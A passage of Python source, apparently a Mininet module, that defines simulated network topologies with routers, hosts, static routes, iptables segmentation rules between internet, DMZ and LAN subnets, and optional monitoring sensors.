self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1+'/8'))
self.addLink('h1', self.swc[1])
self.alias['h1'] = ['12.10.5.2']
self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1+'/8'))
self.addLink('h2', self.swc[1])
self.alias['h2'] = ['12.10.5.3']
self.sroutes['r1'].append('ip route add 12.10.5.2/8 via 12.10.5.2 dev r1-eth1')
self.sroutes['r1'].append('ip route add 12.10.5.3/8 via 12.10.5.3 dev r1-eth1')
self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
# Connect the DMZ
r1IP2 = '192.168.4.1'
r2IP1 = '192.168.4.2'
r2IP2 = '192.168.1.1'
# TODO l' indirizzo di default del router deve corrispondere sempre al' indirizzo della stessa classe degli host che gli sono attaccati (es: r2IP1 non funziona qui!)
self.router2 = self.addNode('r2', cls=LinuxRouter, ip=r2IP1) #r2IP2
self.alias['r2'] = []
self.alias['r1'].append(r1IP2)
self.alias['r2'].append(r2IP1)
self.alias['r2'].append(r2IP2)
self.sroutes['r2'] = []
self.swc[5] = self.addSwitch('s5')
self.addLink(self.swc[5], self.router2, intfName2='r2-eth1', params2={'ip': r2IP1+'/24'})
self.addLink(self.swc[5], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2+'/24'})
self.swc[2] = self.addSwitch('s2')
self.addLink(self.swc[2], self.router2, intfName2='r2-eth2', params2={'ip': r2IP2+'/24'})
self.net_hosts.append(self.addHost('h3', ip='192.168.1.2/24', defaultRoute=r2IP2+'/24'))
self.addLink('h3', self.swc[2])
self.alias['h3'] = ['192.168.1.2']
self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r2IP2+'/24'))
self.addLink('h4', self.swc[2])
self.alias['h4'] = ['192.168.1.3']
self.sroutes['h3'] = ['ip route add default via 192.168.1.1 dev h3-eth0']
self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
self.sroutes['r1'].append('ip route add 192.168.1.0/24 via 192.168.4.2 dev r1-eth2')
self.sroutes['r2'].append('ip route add 192.168.2.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 192.168.3.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 192.168.5.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 12.0.0.0/8 via 192.168.4.1 dev r2-eth1')
# Connect LAN 1 and LAN 2
r1IP3 = '192.168.5.1'
r3IP1 = '192.168.5.2'
r3IP2 = '192.168.2.1'
r3IP3 = '192.168.3.1'
self.router3 = self.addNode('r3', cls=LinuxRouter, ip=r3IP1)
self.alias['r3'] = []
self.alias['r1'].append(r1IP3)
self.alias['r3'].append(r3IP1)
self.alias['r3'].append(r3IP2)
self.alias['r3'].append(r3IP3)
self.sroutes['r3'] = []
self.swc[6] = self.addSwitch('s6')
# Il primo collegamento switch-router DEVE usare l'indirizzo usato nella definizione del router
self.addLink(self.swc[6], self.router3, intfName2='r3-eth1', params2={'ip': r3IP1+'/24'})
self.addLink(self.swc[6], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3+'/24'})
self.swc[3] = self.addSwitch('s3')
self.addLink(self.swc[3], self.router3, intfName2='r3-eth2', params2={'ip': r3IP2+'/24'})
self.net_hosts.append(self.addHost('h5', ip='192.168.2.2/24', defaultRoute=r3IP2+'/24'))
self.addLink('h5', self.swc[3])
self.alias['h5'] = ['192.168.2.2']
self.net_hosts.append(self.addHost('h6', ip='192.168.2.3/24', defaultRoute=r3IP2+'/24'))
self.addLink('h6', self.swc[3])
self.alias['h6'] = ['192.168.2.3']
self.sroutes['h5'] = ['ip route add default via 192.168.2.1 dev h5-eth0']
self.sroutes['h6'] = ['ip route add default via 192.168.2.1 dev h6-eth0']
self.sroutes['r1'].append('ip route add 192.168.2.0/24 via 192.168.5.2 dev r1-eth3')
self.sroutes['r1'].append('ip route add 192.168.3.0/24 via 192.168.5.2 dev r1-eth3')
self.sroutes['r3'].append('ip route add 192.168.1.0/24 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 192.168.4.0/24 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 12.0.0.0/8 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 12.10.5.2/8 via 192.168.5.1 dev r3-eth1')
self.swc[4] = self.addSwitch('s4')
self.addLink(self.swc[4], self.router3, intfName2='r3-eth3', params2={'ip': r3IP3+'/24'})
self.net_hosts.append(self.addHost('h7', ip='192.168.3.2/24', defaultRoute=r3IP3+'/24'))
self.addLink('h7', self.swc[4])
self.alias['h7'] = ['192.168.3.2']
self.net_hosts.append(self.addHost('h8', ip='192.168.3.3/24', defaultRoute=r3IP3+'/24'))
self.addLink('h8', self.swc[4])
self.alias['h8'] = ['192.168.3.3']
self.sroutes['h7'] = ['ip route add default via 192.168.3.1 dev h7-eth0']
self.sroutes['h8'] = ['ip route add default via 192.168.3.1 dev h8-eth0']
if self.sensor1: self.add_sensor_Internet()
if self.sensor2: self.add_sensor_LAN(1)
if self.sensor3: self.add_sensor_LAN(2)
if self.sensor4: self.add_sensor_LAN(3)
def add_sensor_LAN(self, i):
asid = 'has' + str(i)
msid = 'hms' + str(i)
rIP = '192.168.' + str(i) + '.1'
asIP = '192.168.' + str(i) + '.101' # Active sensor IP
msIP = '192.168.' + str(i) + '.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
if i == 1:
sensor=self.swc[2]
intf = 's2-eth1'
elif i == 2 :
sensor=self.swc[3]
intf = 's3-eth1'
else:
sensor=self.swc[4]
intf = 's4-eth1'
self.passive_sensors.append(sensor)
self.interface_name.append(intf)
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
self.addLink(asid, self.swc[i + 1])
self.addLink(msid, self.swc[i + 1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
if i == 1:
self.sroutes['r2'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r2-eth2')
else:
self.sroutes['r3'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r3-eth' + str(i))
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_sensor_Internet(self):
asid = 'hasI'
msid = 'hmsI'
rIP = '12.10.5.1'
asIP = '12.10.5.101' # Active sensor IP
msIP = '12.10.5.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
self.passive_sensors.append(self.swc[1])
self.interface_name.append('s1-eth1')
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
self.addLink(asid, self.swc[1])
self.addLink(msid, self.swc[1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_static_routes(self, net):
'''Add static routes to the router for subnets not directly visible'''
for k in self.sroutes.keys():
for r in self.sroutes[k]:
net[k].cmd(r)
def create_alias_file(self):
with open('alias', 'w') as f:
for k in self.alias.keys():
f.write(k + ' ')
for ip in self.alias[k]:
f.write(ip + ' ')
f.write('\n')
class NetworkTopo5( Topo ):
"""
This topology simulates a network with one router and two firewalls.
Two hosts belong to subnet 12.0.0.0/8, representing the internet.
Two hosts belong to subnet 192.168.1.0/24, representing the DMZ.
Two hosts belong to subnet 192.168.2.0/24, representing LAN 1.
Two hosts belong to subnet 192.168.3.0/24, representing LAN 2.
Communication is only possible between Internet and DMZ and between LAN1 and LAN2.
It os possible to put a sensor in each of the subnets.
"""
def __init__(self, *args, **params):
'''
:param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
:param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.3.0/24
'''
self.sensor1 = False if (params['sensor1'] is None or params['sensor1'] is False) else True
self.sensor2 = False if (params['sensor2'] is None or params['sensor2'] is False) else True
self.sensor3 = False if (params['sensor3'] is None or params['sensor3'] is False) else True
self.sensor4 = False if (params['sensor4'] is None or params['sensor4'] is False) else True
self.swc = {} # Key: Number of switch, value: switch
self.net_hosts = []
self.active_sensors = []
self.passive_sensors = []
self.monitor_sensors = []
self.interface_name = []
self.fw_rules = {} # Key:host name, value: list of rules to be applied
self.alias = {} # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
self.sroutes = {} # Key: Router/Host/sensor id, value = list of static routes to be setup
super(NetworkTopo5, self).__init__()
def build( self, **_opts ):
# Connect router r1 to Internet Hosts
r1IP1 = '12.10.5.1'
self.router1 = self.addNode( 'r1', cls=LinuxRouter, ip=r1IP1+'/8' )
self.alias['r1'] = []
self.alias['r1'].append(r1IP1)
self.sroutes['r1'] = []
self.swc[1] = self.addSwitch('s1')
self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1+'/8'})
self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1+'/8'))
self.addLink('h1', self.swc[1])
self.alias['h1'] = ['12.10.5.2']
self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1+'/8'))
self.addLink('h2', self.swc[1])
self.alias['h2'] = ['12.10.5.3']
self.sroutes['r1'].append('ip route add 12.10.5.2/8 via 12.10.5.2 dev r1-eth1')
self.sroutes['r1'].append('ip route add 12.10.5.3/8 via 12.10.5.3 dev r1-eth1')
self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
# Connect the DMZ
r1IP2 = '192.168.4.1'
r2IP1 = '192.168.4.2'
r2IP2 = '192.168.1.1'
# TODO l' indirizzo di default del router deve corrispondere sempre al' indirizzo della stessa classe degli host che gli sono attaccati (es: r2IP1 non funziona qui!)
self.router2 = self.addNode('r2', cls=LinuxRouter, ip=r2IP1) #r2IP2
self.alias['r2'] = []
self.alias['r1'].append(r1IP2)
self.alias['r2'].append(r2IP1)
self.alias['r2'].append(r2IP2)
self.sroutes['r2'] = []
self.swc[5] = self.addSwitch('s5')
self.addLink(self.swc[5], self.router2, intfName2='r2-eth1', params2={'ip': r2IP1+'/24'})
self.addLink(self.swc[5], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2+'/24'})
self.swc[2] = self.addSwitch('s2')
self.addLink(self.swc[2], self.router2, intfName2='r2-eth2', params2={'ip': r2IP2+'/24'})
self.net_hosts.append(self.addHost('h3', ip='192.168.1.2/24', defaultRoute=r2IP2+'/24'))
self.addLink('h3', self.swc[2])
self.alias['h3'] = ['192.168.1.2']
self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r2IP2+'/24'))
self.addLink('h4', self.swc[2])
self.alias['h4'] = ['192.168.1.3']
self.sroutes['h3'] = ['ip route add default via 192.168.1.1 dev h3-eth0']
self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
self.sroutes['r1'].append('ip route add 192.168.1.0/24 via 192.168.4.2 dev r1-eth2')
self.sroutes['r2'].append('ip route add 192.168.2.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 192.168.3.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 192.168.5.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 12.0.0.0/8 via 192.168.4.1 dev r2-eth1')
self.fw_rules['r1'] = ['iptables -P FORWARD DROP']
self.fw_rules['r1'].append('iptables -A FORWARD -i r1-eth1 -s 12.0.0.0/8 -o r1-eth2 -d 192.168.1.0/24 -j ACCEPT')
self.fw_rules['r1'].append('iptables -A FORWARD -i r1-eth2 -s 192.168.1.0/24 -o r1-eth1 -d 12.0.0.0/8 -j ACCEPT')
# Connect LAN 1 and LAN 2
r1IP3 = '192.168.5.1'
r3IP1 = '192.168.5.2'
r3IP2 = '192.168.2.1'
r3IP3 = '192.168.3.1'
self.router3 = self.addNode('r3', cls=LinuxRouter, ip=r3IP1)
self.alias['r3'] = []
self.alias['r1'].append(r1IP3)
self.alias['r3'].append(r3IP1)
self.alias['r3'].append(r3IP2)
self.alias['r3'].append(r3IP3)
self.sroutes['r3'] = []
self.swc[6] = self.addSwitch('s6')
# Il primo collegamento switch-router DEVE usare l'indirizzo usato nella definizione del router
self.addLink(self.swc[6], self.router3, intfName2='r3-eth1', params2={'ip': r3IP1+'/24'})
self.addLink(self.swc[6], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3+'/24'})
self.swc[3] = self.addSwitch('s3')
self.addLink(self.swc[3], self.router3, intfName2='r3-eth2', params2={'ip': r3IP2+'/24'})
self.net_hosts.append(self.addHost('h5', ip='192.168.2.2/24', defaultRoute=r3IP2+'/24'))
self.addLink('h5', self.swc[3])
self.alias['h5'] = ['192.168.2.2']
self.net_hosts.append(self.addHost('h6', ip='192.168.2.3/24', defaultRoute=r3IP2+'/24'))
self.addLink('h6', self.swc[3])
self.alias['h6'] = ['192.168.2.3']
self.sroutes['h5'] = ['ip route add default via 192.168.2.1 dev h5-eth0']
self.sroutes['h6'] = ['ip route add default via 192.168.2.1 dev h6-eth0']
self.sroutes['r1'].append('ip route add 192.168.2.0/24 via 192.168.5.2 dev r1-eth3')
self.sroutes['r1'].append('ip route add 192.168.3.0/24 via 192.168.5.2 dev r1-eth3')
self.sroutes['r3'].append('ip route add 192.168.1.0/24 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 192.168.4.0/24 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 12.0.0.0/8 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 12.10.5.2/8 via 192.168.5.1 dev r3-eth1')
self.swc[4] = self.addSwitch('s4')
self.addLink(self.swc[4], self.router3, intfName2='r3-eth3', params2={'ip': r3IP3+'/24'})
self.net_hosts.append(self.addHost('h7', ip='192.168.3.2/24', defaultRoute=r3IP3+'/24'))
self.addLink('h7', self.swc[4])
self.alias['h7'] = ['192.168.3.2']
self.net_hosts.append(self.addHost('h8', ip='192.168.3.3/24', defaultRoute=r3IP3+'/24'))
self.addLink('h8', self.swc[4])
self.alias['h8'] = ['192.168.3.3']
self.sroutes['h7'] = ['ip route add default via 192.168.3.1 dev h7-eth0']
self.sroutes['h8'] = ['ip route add default via 192.168.3.1 dev h8-eth0']
self.fw_rules['r3'] = ['iptables -P FORWARD DROP']
self.fw_rules['r3'].append('iptables -A FORWARD -i r3-eth2 -s 192.168.2.0/24 -o r3-eth3 -d 192.168.3.0/24 -j ACCEPT')
self.fw_rules['r3'].append('iptables -A FORWARD -i r3-eth3 -s 192.168.3.0/24 -o r3-eth2 -d 192.168.2.0/24 -j ACCEPT')
if self.sensor1: self.add_sensor_Internet()
if self.sensor2: self.add_sensor_LAN(1)
if self.sensor3: self.add_sensor_LAN(2)
if self.sensor4: self.add_sensor_LAN(3)
def add_sensor_LAN(self, i):
asid = 'has' + str(i)
msid = 'hms' + str(i)
rIP = '192.168.' + str(i) + '.1'
asIP = '192.168.' + str(i) + '.101' # Active sensor IP
msIP = '192.168.' + str(i) + '.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
if i == 1:
sensor=self.swc[2]
intf = 's2-eth1'
elif i == 2 :
sensor=self.swc[3]
intf = 's3-eth1'
else:
sensor=self.swc[4]
intf = 's4-eth1'
self.passive_sensors.append(sensor)
self.interface_name.append(intf)
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
self.addLink(asid, self.swc[i + 1])
self.addLink(msid, self.swc[i + 1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
if i == 1:
self.sroutes['r2'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r2-eth2')
else:
self.sroutes['r3'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r3-eth' + str(i))
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_sensor_Internet(self):
asid = 'hasI'
msid = 'hmsI'
rIP = '12.10.5.1'
asIP = '12.10.5.101' # Active sensor IP
msIP = '12.10.5.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
self.passive_sensors.append(self.swc[1])
self.interface_name.append('s1-eth1')
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
self.addLink(asid, self.swc[1])
self.addLink(msid, self.swc[1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_static_routes(self, net):
'''Add static routes to the router for subnets not directly visible'''
for k in self.sroutes.keys():
for r in self.sroutes[k]:
net[k].cmd(r)
def add_firewall_rules(self, net):
'''Add firewall rules'''
for k in self.fw_rules.keys():
for r in self.fw_rules[k]:
net[k].cmd(r)
def create_alias_file(self):
with open('alias', 'w') as f:
for k in self.alias.keys():
f.write(k + ' ')
for ip in self.alias[k]:
f.write(ip + ' ')
f.write('\n')
class NetworkTopo6( Topo ):
"""
This topology simulates a network with one router.
Three hosts belong to subnet 12.0.0.0/8, representing the internet.
Three hosts belong to subnet 192.168.1.0/24, representing the DMZ.
Three hosts belong to subnet 192.168.2.0/24, representing LAN.
Communication possible among all subnets.
"""
def __init__(self, *args, **params):
'''
:param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
:param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
'''
self.sensor1 = False if (params['sensor1'] is None or params['sensor1'] is False) else True
self.sensor2 = False if (params['sensor2'] is None or params['sensor2'] is False) else True
self.sensor3 = False if (params['sensor3'] is None or params['sensor3'] is False) else True
self.swc = {} # Key: Number of switch, value: switch
self.net_hosts = []
self.active_sensors = []
self.passive_sensors = []
self.monitor_sensors = []
self.interface_name = []
self.alias = {} # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
self.sroutes = {} # Key: Router/Host/sensor id, value = list of static routes to be setup
super(NetworkTopo6, self).__init__()
def build( self, **_opts ):
# Connect router r1 to Internet Hosts
r1IP1 = '12.10.5.1'
self.router1 = self.addNode( 'r1', cls=LinuxRouter, ip=r1IP1+'/8' )
self.alias['r1'] = []
self.alias['r1'].append(r1IP1)
self.sroutes['r1'] = []
self.swc[1] = self.addSwitch('s1')
self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1+'/8'})
self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1+'/8'))
self.addLink('h1', self.swc[1])
self.alias['h1'] = ['12.10.5.2']
self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1+'/8'))
self.addLink('h2', self.swc[1])
self.alias['h2'] = ['12.10.5.3']
self.net_hosts.append(self.addHost('h3', ip='12.10.5.4/8', defaultRoute=r1IP1+'/8'))
self.addLink('h3', self.swc[1])
self.alias['h3'] = ['12.10.5.4']
#self.sroutes['r1'].append('ip route add 12.0.0.0/8 via 12.10.5.2 dev r1-eth1')
#self.sroutes['r1'].append('ip route add 12.10.5.3/8 via 12.10.5.3 dev r1-eth1')
#self.sroutes['r1'].append('ip route add 12.10.5.4/8 via 12.10.5.4 dev r1-eth1')
self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
self.sroutes['h3'] = ['ip route add default via 12.10.5.1 dev h3-eth0']
# Connect the DMZ
r1IP2 = '192.168.1.1'
self.alias['r1'].append(r1IP2)
self.swc[2] = self.addSwitch('s2')
self.addLink(self.swc[2], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2+'/24'})
self.net_hosts.append(self.addHost('h5', ip='192.168.1.2/24', defaultRoute=r1IP2+'/24'))
self.addLink('h5', self.swc[2])
self.alias['h5'] = ['192.168.1.2']
self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r1IP2+'/24'))
self.addLink('h4', self.swc[2])
self.alias['h4'] = ['192.168.1.3']
self.net_hosts.append(self.addHost('h6', ip='192.168.1.4/24', defaultRoute=r1IP2 + '/24'))
self.addLink('h6', self.swc[2])
self.alias['h6'] = ['192.168.1.4']
self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
self.sroutes['h5'] = ['ip route add default via 192.168.1.1 dev h5-eth0']
self.sroutes['h6'] = ['ip route add default via 192.168.1.1 dev h6-eth0']
#self.sroutes['r1'].append('ip route add 192.168.1.0/24 via 192.168.4.2 dev r1-eth2')
# Connect LAN
r1IP3 = '192.168.2.1'
self.alias['r1'].append(r1IP3)
self.swc[3] = self.addSwitch('s3')
# Il primo collegamento switch-router DEVE usare l'indirizzo usato nella definizione del router)
self.addLink(self.swc[3], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3+'/24'})
self.net_hosts.append(self.addHost('h9', ip='192.168.2.2/24', defaultRoute=r1IP3+'/24'))
self.addLink('h9', self.swc[3])
self.alias['h9'] = ['192.168.2.2']
self.net_hosts.append(self.addHost('h7', ip='192.168.2.3/24', defaultRoute=r1IP3+'/24'))
self.addLink('h7', self.swc[3])
self.alias['h7'] = ['192.168.2.3']
self.net_hosts.append(self.addHost('h8', ip='192.168.2.4/24', defaultRoute=r1IP3 + '/24'))
self.addLink('h8', self.swc[3])
self.alias['h8'] = ['192.168.2.4']
self.sroutes['h8'] = ['ip route add default via 192.168.2.1 dev h8-eth0']
self.sroutes['h7'] = ['ip route add default via 192.168.2.1 dev h7-eth0']
self.sroutes['h9'] = ['ip route add default via 192.168.2.1 dev h9-eth0']
if self.sensor1: self.add_sensor_Internet()
if self.sensor2: self.add_sensor_LAN(1)
if self.sensor3: self.add_sensor_LAN(2)
def add_sensor_LAN(self, i):
asid = 'has' + str(i)
msid = 'hms' + str(i)
rIP = '192.168.' + str(i) + '.1'
asIP = '192.168.' + str(i) + '.101' # Active sensor IP
msIP = '192.168.' + str(i) + '.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
if i == 1:
sensor=self.swc[2]
intf = 's2-eth1'
else:
sensor = self.swc[3]
intf = 's3-eth1'
self.passive_sensors.append(sensor)
self.interface_name.append(intf)
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
self.addLink(asid, self.swc[i + 1])
self.addLink(msid, self.swc[i + 1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
#if i == 1:
# self.sroutes['r2'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r2-eth2')
#else:
# self.sroutes['r3'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r3-eth' + str(i))
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_sensor_Internet(self):
asid = 'hasI'
msid = 'hmsI'
rIP = '12.10.5.1'
asIP = '12.10.5.101' # Active sensor IP
msIP = '12.10.5.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
self.passive_sensors.append(self.swc[1])
self.interface_name.append('s1-eth1')
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
self.addLink(asid, self.swc[1])
self.addLink(msid, self.swc[1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_static_routes(self, net):
'''Add static routes to the router for subnets not directly visible'''
for k in self.sroutes.keys():
for r in self.sroutes[k]:
net[k].cmd(r)
def create_alias_file(self):
with open('alias', 'w') as f:
for k in self.alias.keys():
f.write(k + ' ')
for ip in self.alias[k]:
f.write(ip + ' ')
f.write('\n')
class NetworkTopo7( Topo ):
"""
This topology simulates a network with one firewall.
Three hosts belong to subnet 12.0.0.0/8, representing the internet.
Three hosts belong to subnet 192.168.1.0/24, representing the DMZ.
Three hosts belong to subnet 192.168.2.0/24, representing LAN.
Communication is possible only inside the LAN or between Internet and DMZ.
"""
def __init__(self, *args, **params):
'''
:param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
:param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
'''
self.sensor1 = False if (params['sensor1'] is None or params['sensor1'] is False) else True
self.sensor2 = False if (params['sensor2'] is None or params['sensor2'] is False) else True
self.sensor3 = False if (params['sensor3'] is None or params['sensor3'] is False) else True
self.swc = {} # Key: Number of switch, value: switch
self.net_hosts = []
self.active_sensors = []
self.passive_sensors = []
self.monitor_sensors = []
self.interface_name = []
self.fw_rules = {} # Key:host name, value: list of rules to be applied
self.alias = {} # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
self.sroutes = {} # Key: Router/Host/sensor id, value = list of static routes to be setup
super(NetworkTopo7, self).__init__()
def build( self, **_opts ):
# Connect router r1 to Internet Hosts
r1IP1 = '12.10.5.1'
self.router1 = self.addNode('r1', cls=LinuxRouter, ip=r1IP1+'/8' )
self.alias['r1'] = []
self.alias['r1'].append(r1IP1)
self.sroutes['r1'] = []
self.swc[1] = self.addSwitch('s1')
self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1+'/8'})
self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1+'/8'))
self.addLink('h1', self.swc[1])
self.alias['h1'] = ['12.10.5.2']
self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1+'/8'))
self.addLink('h2', self.swc[1])
self.alias['h2'] = ['12.10.5.3']
self.net_hosts.append(self.addHost('h3', ip='12.10.5.4/8', defaultRoute=r1IP1+'/8'))
self.addLink('h3', self.swc[1])
self.alias['h3'] = ['12.10.5.4']
#self.sroutes['r1'].append('ip route add 12.0.0.0/8 via 12.10.5.2 dev r1-eth1')
#self.sroutes['r1'].append('ip route add 12.10.5.3/8 via 12.10.5.3 dev r1-eth1')
#self.sroutes['r1'].append('ip route add 12.10.5.4/8 via 12.10.5.4 dev r1-eth1')
self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
self.sroutes['h3'] = ['ip route add default via 12.10.5.1 dev h3-eth0']
# Connect the DMZ
r1IP2 = '192.168.1.1'
self.alias['r1'].append(r1IP2)
self.swc[2] = self.addSwitch('s2')
self.addLink(self.swc[2], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2+'/24'})
self.net_hosts.append(self.addHost('h5', ip='192.168.1.2/24', defaultRoute=r1IP2+'/24'))
self.addLink('h5', self.swc[2])
self.alias['h5'] = ['192.168.1.2']
self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r1IP2+'/24'))
self.addLink('h4', self.swc[2])
self.alias['h4'] = ['192.168.1.3']
self.net_hosts.append(self.addHost('h6', ip='192.168.1.4/24', defaultRoute=r1IP2 + '/24'))
self.addLink('h6', self.swc[2])
self.alias['h6'] = ['192.168.1.4']
self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
self.sroutes['h5'] = ['ip route add default via 192.168.1.1 dev h5-eth0']
self.sroutes['h6'] = ['ip route add default via 192.168.1.1 dev h6-eth0']
#self.sroutes['r1'].append('ip route add 192.168.1.0/24 via 192.168.4.2 dev r1-eth2')
# Connect LAN
r1IP3 = '192.168.2.1'
self.alias['r1'].append(r1IP3)
self.swc[3] = self.addSwitch('s3')
# Il primo collegamento switch-router DEVE usare l'indirizzo usato nella definizione del router)
self.addLink(self.swc[3], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3+'/24'})
self.net_hosts.append(self.addHost('h9', ip='192.168.2.2/24', defaultRoute=r1IP3+'/24'))
self.addLink('h9', self.swc[3])
self.alias['h9'] = ['192.168.2.2']
